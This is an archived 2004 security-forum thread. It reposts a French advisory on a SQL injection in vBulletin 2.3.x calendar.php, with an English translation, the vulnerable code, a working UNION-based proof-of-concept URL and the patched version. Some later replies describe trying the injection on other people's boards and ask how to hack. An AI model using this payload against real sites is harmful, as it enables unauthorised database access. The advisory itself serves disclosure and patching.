Vbulletin "calendar.php" Sql Injection Vulnerabili

Full Version: Vbulletin "calendar.php" Sql Injection Vulnerabili

GovernmentSecurity.org > The Archives > Exploit Articles

Nurgle

Jan 8 2004, 05:54 PM

[QUOTE]
Date de Publication: 2004-01-07 © K-OTik.COM
Titre: vBulletin 2.3.x "calendar.php" SQL Injection Vulnerability
K-Otik ID : 0481
Risque : Elevé
Exploitable à distance : Oui
Exploitable en local : Oui

* Description Technique - Exploit *

Une vulnérabilité a été identifiée dans le célèbre forum php vBulletin. Le probleme est de type SQL Injection, il se situe dans la variable "eventid" présente dans le fichier "calendar.php".

------------------------ line 585 in calendar.php ---------------------------------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid = $eventid");
-------------------------------------------------------------------------------------

---------------------------- Proof of Concept -------------------------------------
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate
-------------------------------------------------------------------------------------

* Versions Vulnérables *

vBulletin version v2.3.3 et inférieures.

* Solution *

Utiliser vBulletin version 2.3.4.
http://www.vbulletin.com

* Crédit *

Vulnérabilité découverte par Qianwei Hu (Janvier 2004)

Its french sorry

Kynroxes

Jan 9 2004, 05:49 AM

QUOTE

/*
English Translation:
*/

Date of Publication: 2004-01-07 © K-OTik.COM
Title: vBulletin 2.3.x "calendar.php" SQL Injection Vulnerability
K-Otik ID : 0481
Risk : High
Remote : Yes
Local : Yes

* Technical Description - Exploit *

A vulnerability was identified in the famous forum php vBulletin. The problem is of type SQL Injection, it is in the variable "eventid" present in the file "calendar.php".

------------------------ line 585 in calendar.php ---------------------------------
else if ($action == "edit")
{
$eventinfo = $DB_site->query_first("SELECT
allowsmilies,public,userid,eventdate,event,subject FROM calendar_events
WHERE eventid = $eventid");
-------------------------------------------------------------------------------------

---------------------------- Proof of Concept -------------------------------------
calendar.php?s=&action=edit&eventid=14 union (SELECT
allowsmilies,public,userid,'0000-0-0',version(),userid FROM calendar_events
WHERE eventid = 14) order by eventdate
-------------------------------------------------------------------------------------

* Vulnerable versions *

vBulletin version v2.3.3 and lower.

* Solution *

To use vBulletin version 2.3.4.
http://www.vbulletin.com

* Credit *

Vulnerability discovered by Qianwei Hu (January 2004).

zero-maitimax

Jan 12 2004, 10:06 AM

a stupid question (i don't know nothing about forum's)

but how do i see what version it's using?

clip

Jan 12 2004, 02:44 PM

on the bottom on every page.

QUOTE

< Contact Us - * >

Powered by: vBulletin Version 2.2.5
Copyright ©2000, 2001, Jelsoft Enterprises Limited.

zero-maitimax

Jan 13 2004, 09:09 AM

oke tnx now i know

isaiah

Jan 14 2004, 09:22 AM

i tried it and still cant get to work

DrDoc

Jan 14 2004, 10:57 AM

Arrgg.. now i have to fix my board :\

thx 4 nfo.. i will tested before i secure it.. °°

Cya Doc

The Storm

Jan 14 2004, 12:50 PM

but how to hack does anybody know an exploit or sth else?

dreedz

Jan 14 2004, 05:25 PM

Tried it on a couple of different boards, didn't work very well though.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.